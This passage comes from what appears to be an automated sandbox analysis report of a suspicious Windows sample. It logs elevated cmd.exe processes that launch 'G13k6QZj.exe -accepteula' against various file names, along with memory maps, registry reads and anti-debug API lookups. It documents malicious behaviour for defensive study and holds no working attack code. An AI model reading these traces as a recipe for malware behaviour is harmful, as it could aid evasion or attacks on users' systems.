| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 48, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xdc8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #40: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #40 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "ImagingDevices.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:06, Reason: Child Process |
| Unmonitor | End Time: 00:02:14, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd04 |
| Parent PID | 0xea4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D7C
0x
884
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000090000 | 0x00090000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x0009ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00223fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00230fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00241fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00390000 | 0x0044dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006dffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04980000 | 0x04cb6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eb40000 | 0x7eb40000 | 0x7ec3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ec40000 | 0x7ec40000 | 0x7ec62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ec68000 | 0x7ec68000 | 0x7ec68fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec69000 | 0x7ec69000 | 0x7ec6bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec6c000 | 0x7ec6c000 | 0x7ec6efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec6f000 | 0x7ec6f000 | 0x7ec6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 3, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x41c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #41: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #41 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:06, Reason: Child Process |
| Unmonitor | End Time: 00:02:13, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa28 |
| Parent PID | 0xd74 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D14
0x
2EC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000008f0000 | 0x008f0000 | 0x0090ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x008fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x00903fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x00911fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x00913fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x00923fff | Pagefile Backed Memory | r |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000004980000 | 0x04980000 | 0x04993fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000049a0000 | 0x049a0000 | 0x049dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x04adffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ae0000 | 0x04ae0000 | 0x04ae0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04af1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04b00000 | 0x04bbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004dc0000 | 0x04dc0000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x0501ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05020000 | 0x05356fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f280000 | 0x7f280000 | 0x7f37ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f380000 | 0x7f380000 | 0x7f3a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f3a8000 | 0x7f3a8000 | 0x7f3a8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3a9000 | 0x7f3a9000 | 0x7f3abfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3ac000 | 0x7f3ac000 | 0x7f3aefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3af000 | 0x7f3af000 | 0x7f3affff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 248, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xe74, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #42: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #42 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "Journal.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:06, Reason: Child Process |
| Unmonitor | End Time: 00:02:42, Reason: Self Terminated |
| Monitor Duration | 00:00:36 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe1c |
| Parent PID | 0x768 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A2C
0x
CC8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000c90000 | 0x00c90000 | 0x04c8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04caffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c90000 | 0x04c90000 | 0x04c9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004ca0000 | 0x04ca0000 | 0x04ca3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cb0000 | 0x04cb0000 | 0x04cb1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cb0000 | 0x04cb0000 | 0x04cb3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cc0000 | 0x04cc0000 | 0x04cd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ce0000 | 0x04ce0000 | 0x04d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d20000 | 0x04d20000 | 0x04e1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e20000 | 0x04e20000 | 0x04e23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e30000 | 0x04e30000 | 0x04e30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e40000 | 0x04e40000 | 0x04e41fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04e50000 | 0x04f0dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f10000 | 0x04f10000 | 0x04f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f50000 | 0x04f50000 | 0x04f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x0505ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050f0000 | 0x050f0000 | 0x050fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x051fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05200000 | 0x05536fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| sysmain.sdb | 0x7eb80000 | 0x7ef0ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000007ef10000 | 0x7ef10000 | 0x7f00ffff | Pagefile Backed Memory | r |
